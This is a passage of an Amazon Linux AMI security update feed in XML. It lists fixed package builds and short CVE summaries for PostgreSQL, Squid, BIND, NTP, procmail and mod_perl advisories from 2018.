arch="x86_64"><filename>Packages/postgresql94-libs-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.14-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1080</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1080: important priority package update for postgresql92</title><issued date="2018-09-19 17:08:00" /><updated date="2018-09-19 23:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-2.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1081</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1081: medium priority package update for squid</title><issued date="2018-09-19 17:10:00" /><updated date="2018-09-19 23:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000027:
The Squid Software Foundation Squid HTTP Caching Proxy version prior to version 4.0.23 contains a NULL Pointer Dereference vulnerability in HTTP Response X-Forwarded-For header processing that can result in Denial of Service to all clients of the proxy. This attack appear to be exploitable via Remote HTTP server responding with an X-Forwarded-For header to certain types of HTTP request. This vulnerability appears to have been fixed in 4.0.23 and later.
1536942:
CVE-2018-1000027 squid: Incorrect pointer handling in HTTP processing and certificate download can lead to denial of service
CVE-2018-1000024:
The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server delivers an HTTP response payload containing valid but unusual ESI syntax.. This vulnerability appears to have been fixed in 4.0.23 and later.
1536939:
CVE-2018-1000024 squid: Incorrect pointer handling when processing ESI Responses can lead to denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000024" title="" id="CVE-2018-1000024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000027" title="" id="CVE-2018-1000027" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-11.35.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-11.35.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-11.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1082</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1082: important priority package update for bind</title><issued date="2018-09-19 17:17:00" /><updated date="2018-09-19 23:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5740:
A denial of service flaw was discovered in bind versions that include the &quot;deny-answer-aliases&quot; feature. This flaw may allow a remote attacker to trigger an INSIST assert in named leading to termination of the process and a denial of service condition.
1613595:
CVE-2018-5740 bind: processing of certain records when "deny-answer-aliases" is in use may trigger an assert leading to a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5740" title="" id="CVE-2018-5740" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-libs" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1083</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1083: low priority package update for ntp</title><issued date="2018-09-19 17:19:00" /><updated date="2018-09-19 23:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7170:
ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim&#039;s clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549.
1550214:
CVE-2018-7170 ntp: Ephemeral association time spoofing additional protection
CVE-2018-12327:
The ntpq and ntpdc command-line utilities that are part of ntp package are vulnerable to stack-based buffer overflow via crafted hostname. Applications using these vulnerable utilities with an untrusted input may be potentially exploited, resulting in a crash or arbitrary code execution under privileges of that application.
1593580:
CVE-2018-12327 ntp: Stack-based buffer overflow in ntpq and ntpdc allows denial of service or code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327" title="" id="CVE-2018-12327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170" title="" id="CVE-2018-7170" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p12-1.39.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p12-1.39.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p12-1.39.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p12-1.39.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p12-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1084</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1084: important priority package update for procmail</title><issued date="2018-09-19 19:22:00" /><updated date="2018-09-19 23:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16844:
A heap-based buffer overflow flaw was found in procmail&#039;s formail utility. A remote attacker could send a specially crafted email that, when processed by formail, could cause formail to crash or, possibly, execute arbitrary code as the user running formail.
1500070:
CVE-2017-16844 procmail: Heap-based buffer overflow in loadbuf function in formisc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16844" title="" id="CVE-2017-16844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="procmail-debuginfo" version="3.22" release="25.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-debuginfo-3.22-25.1.7.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-3.22-25.1.7.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-3.22-25.1.7.amzn1.i686.rpm</filename></package><package name="procmail-debuginfo" version="3.22" release="25.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-debuginfo-3.22-25.1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1085</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1085: important priority package update for mod_perl mod24_perl</title><issued date="2018-10-03 02:54:00" /><updated date="2018-10-04 22:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-2767:
mod_perl 2.0 through 2.0.10 allows attackers to execute arbitrary Perl code by placing it in a user-owned .htaccess file, because (contrary to the documentation) there is no configuration option that permits Perl code for the administrator&#039;s control of HTTP request processing without also permitting unprivileged users to run Perl code in the context of the user account that runs Apache HTTP Server processes.
1623265:
CVE-2011-2767 mod_perl: arbitrary Perl code execution in the context of the user account via a user-owned .htaccess
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2767" title="" id="CVE-2011-2767" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_perl-devel" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-devel-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl-debuginfo" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-debuginfo-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl" version="2.0.7" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_perl-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod24_perl-devel" version="2.0.7" release="7.20.amzn1" epoch="0" 